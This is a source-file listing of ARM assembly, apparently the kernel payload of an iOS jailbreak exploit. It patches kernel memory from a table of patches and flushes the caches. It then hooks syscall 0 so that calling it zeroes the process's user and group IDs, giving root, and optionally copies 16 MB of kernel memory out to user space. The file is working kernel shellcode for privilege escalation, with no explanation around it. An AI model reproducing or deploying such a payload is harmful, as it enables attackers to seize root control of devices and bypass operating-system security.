/
kcode.S
121 lines (104 loc) · 2.07 KB
/
kcode.S
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#if VERSION >= 0x040300
#define c(a, b) a
#else
#define c(a, b) b
#endif
.syntax unified
.arm
start:
# xxx offset
ldr sp, [sp, #(856 + 0x40 - 0xa0)]
sub sp, #0x18
#if 0
mov r5, sp; mov sp, #0x80000000; orr sp, #0x2000; mov pc, #-1
#endif
#if VERSION >= 0x040206 && VERSION < 0x040300
ldr r6, [sp, #(0x3c - 0x30 - 0x24)]
#else
ldr r6, [r4]
#endif
adr r0, inspiring
bl _IOLog
#mov r0, #105
#mov r1, #9
#blx _proc_signal
#mov r8, #0; b end
adr r5, stuff
ldr r8, count
pf_loop:
ldm r5, {r0, r2}
add r1, r5, #8
bl _memmove
ldm r5, {r0, r1}
mov r2, #0
bl _flush_dcache
ldm r5!, {r0, r1}
add r5, r1
mov r2, #0
bl _invalidate_icache
subs r8, #1
bne pf_loop
end:
bl _IOLockAlloc
str r0, [r6, #c(0x2d8, 0x23c)]
str r8, [r6, #c(0x238, 0x19c)]
str r8, [r6, #c(0x2d4, 0x238)]
# fix up linked lists
#if 0 && (VERSION < 0x040300)
add r0, r6, #0x170
str r0, [r6, #0x170]
str r0, [r6, #0x174]
add r0, r6, #0x178
str r0, [r6, #0x178]
str r0, [r6, #0x17c]
#endif
add r0, r6, #c(0x218, 0x180)
str r0, [r6, #c(0x21c, 0x184)]
add r0, r6, #c(0x220, 0x188)
str r0, [r6, #c(0x220, 0x188)]
str r0, [r6, #c(0x224, 0x18c)]
#if defined(DEJAVU) || defined(DUMP)
ldr r0, sysent
adr r1, syscall_0
str r1, [r0, #0x4]
#endif
#ifdef DUMP
mov r0, #(16*1024*1024)
bl _IOMalloc
str r0, dumpbuf
mov r1, #0x80000000
mov r2, #(16*1024*1024)
bl _memcpy
#endif
pop {r8, r10, r11}
pop {r4-r7, pc}
#if defined(DEJAVU) || defined(DUMP)
syscall_0:
push {lr}
#ifdef DUMP
ldr r0, dumpbuf
mov r1, #0x10000000
mov r2, #(16*1024*1024)
bl _copyout
#else
bl _proc_ucred
mov r1, #0
str r1, [r0, #0xc]
str r1, [r0, #0x10]
ldr r0, [r0, #c(0x6c, 0x80)]
cmp r0, #0
strne r1, [r0, #8]
#endif
ldr r0, sysent
ldr r1, [r0, #0xc4]
str r1, [r0, #0x4]
pop {pc}
#endif
inspiring: .asciz "I exist!\n"
.align 2
#ifdef DUMP
dumpbuf: .long 0
#endif
sysent: .long 0
count: .long 0
stuff: